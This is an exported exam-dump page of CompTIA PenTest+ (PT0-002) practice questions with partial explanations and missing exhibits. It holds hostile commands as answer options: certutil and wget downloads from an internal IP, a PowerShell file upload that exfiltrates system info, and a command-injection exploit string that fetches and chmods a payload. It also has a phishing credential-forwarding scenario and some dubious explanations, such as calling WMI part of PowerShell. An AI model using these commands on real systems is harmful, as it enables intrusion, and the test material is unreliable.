This page was exported from Exam for engine [ http://blog.test4engine.com ]
Export date: Mon Nov 18 2:27:54 2024 / +0000 GMT

Title: CompTIA PT0-002 Real 2024 Braindumps Mock Exam Dumps [Q51-Q69]

PT0-002 Exam Questions | Real PT0-002 Practice Dumps

NO.51 A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:
Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
- Run an application vulnerability scan and then identify the TCP ports used by the application.
- Run the application attached to a debugger and then review the application’s log.
- Disassemble the binary code and then identify the break points.
- Start a packet capture with Wireshark and then run the application.

NO.52 A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client’s expectations?
- OWASP Top 10
- MITRE ATT&CK framework
- NIST Cybersecurity Framework
- The Diamond Model of Intrusion Analysis

NO.53 A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:
Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)
- Telnet
- HTTP
- SMTP
- DNS
- NTP
- SNMP

NO.54 A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary?
- To meet PCI DSS testing requirements
- For testing of the customer’s SLA with the ISP
- Because of concerns regarding bandwidth limitations
- To ensure someone is available if something goes wrong

NO.55 A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
- certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
- powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
- schtasks /query /fo LIST /v | find /I "Next Run Time:"
- wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
References:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

NO.56 A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
- PLCs will not act upon commands injected over the network.
- Supervisors and controllers are on a separate virtual network by default.
- Controllers will not validate the origin of commands.
- Supervisory systems will detect a malicious injection of code/commands.

NO.57 A penetration tester conducts an Nmap scan against a target and receives the following results:
Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?
- Nessus
- ProxyChains
- OWASP ZAP
- Empire

NO.58 A penetration tester has completed an analysis of the various software products produced by the company under assessment.
The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?
- Add a dependency checker into the tool chain.
- Perform routine static and dynamic analysis of committed code.
- Validate API security settings before deployment.
- Perform fuzz testing of compiled binaries.

NO.59 For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:
Which of the following lines of code should the security engineer add to make the attack successful?
- window.location.= 'https://evilcorp.com'
- crossDomain: true
- geturlparameter ('username')
- redirectUrl = 'https://example.com'

NO.60 A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?
- Alternate data streams
- PowerShell modules
- MP4 steganography
- PsExec
Explanation
“Windows Management Instrumentation (WMI) is a subsystem of PowerShell that gives admins access to powerful system monitoring tools.”

NO.61 Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
- S/MIME
- FTPS
- DNSSEC
- AS2
Explanation
S/MIME stands for Secure/Multipurpose Internet Mail Extensions and is a standard for encrypting and signing email messages. It uses public key cryptography to ensure the confidentiality, integrity, and authenticity of email communications. FTPS is a protocol for transferring files securely over SSL/TLS, but it is not used for emailing. DNSSEC is a protocol for securing DNS records, but it does not protect email content. AS2 is a protocol for exchanging business documents over HTTP/S, but it is not used for emailing.

NO.62 Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?
- The IP address is wrong.
- The server is unreachable.
- The IP address is on the blocklist.
- The IP address is on the allow list.
Explanation
The most likely explanation for why a penetration tester cannot scan a server that was previously scanned successfully is that the IP address is on the blocklist. Blocklists are used to prevent malicious actors from scanning servers, and if the IP address of the server is on the blocklist, the scanning process will be blocked.

NO.63 You are a penetration tester reviewing a client’s website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

NO.64 A penetration tester was able to gain access to a system using an exploit.
The following is a snippet of the code that was utilized:

    exploit = "POST "
    exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS&loginUser=a&Pwd=a"
    exploit += "HTTP/1.1"

Which of the following commands should the penetration tester run post-engagement?
- grep -v apache ~/.bash_history > ~/.bash_history
- rm -rf /tmp/apache
- chmod 600 /tmp/apache
- taskkill /IM "apache" /F

NO.65 You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
See explanation below.
Explanation
Part 1: 192.168.2.2 -O -sV --top-ports=100 and SMB vulns
Part 2: Weak SMB file permissions
https://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprinting

NO.66 Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
- Whether the cloud service provider allows the penetration tester to test the environment
- Whether the specific cloud services are being used by the application
- The geographical location where the cloud services are running
- Whether the country where the cloud service is based has any impeding laws
Explanation
The first thing that a penetration tester should consider when engaging in a penetration test in a cloud environment is whether the cloud service provider allows the tester to test the environment, as this will determine whether the tester has permission or authorization to perform the test.
Some cloud service providers have policies or terms of service that prohibit or restrict penetration testing on their platforms or require prior approval or notification before testing. The tester should review these policies and obtain written consent from the provider before conducting any testing activities.

NO.67 A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
- Send deauthentication frames to the stations.
- Perform jamming on all 2.4GHz and 5GHz channels.
- Set the malicious AP to broadcast within dynamic frequency selection channels.
- Modify the malicious AP configuration to not use a pre-shared key.

NO.68 An Nmap scan of a network switch reveals the following:
Which of the following technical controls will most likely be the FIRST recommendation for this device?
- Encrypted passwords
- System-hardening techniques
- Multifactor authentication
- Network segmentation

NO.69 Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?
- Scraping social media for personal details
- Registering domain names that are similar to the target company’s
- Identifying technical contacts at the company
- Crawling the company’s website for company information
Explanation
Scraping social media for personal details can help a penetration tester craft personalized and convincing social engineering attacks against top-level executives, who may share sensitive or confidential information on their profiles. Registering domain names that are similar to the target company’s can be used for phishing or typosquatting attacks, but not specifically against executives.
Identifying technical contacts at the company can help with reconnaissance, but not with social engineering. Crawling the company’s website for company information can provide general background knowledge, but not specific details about executives.

CompTIA PT0-002 exam is a challenging and comprehensive certification program designed to assess your skills in performing penetration testing, identifying vulnerabilities, and mitigating security risks. It's a valuable certification for cybersecurity professionals who want to enhance their skills and expertise while demonstrating their knowledge of key cybersecurity concepts and methodologies. If you're considering a career in cybersecurity or looking to take your skills to the next level, the CompTIA PT0-002 certification is an excellent way to demonstrate your capabilities and stand out in the job market.

Verified PT0-002 Exam Dumps Q&As - Provide PT0-002 with Correct Answers: https://www.test4engine.com/PT0-002_exam-latest-braindumps.html

Post date: 2024-01-05 16:21:56 GMT
Post modified date: 2024-01-05 16:21:56 GMT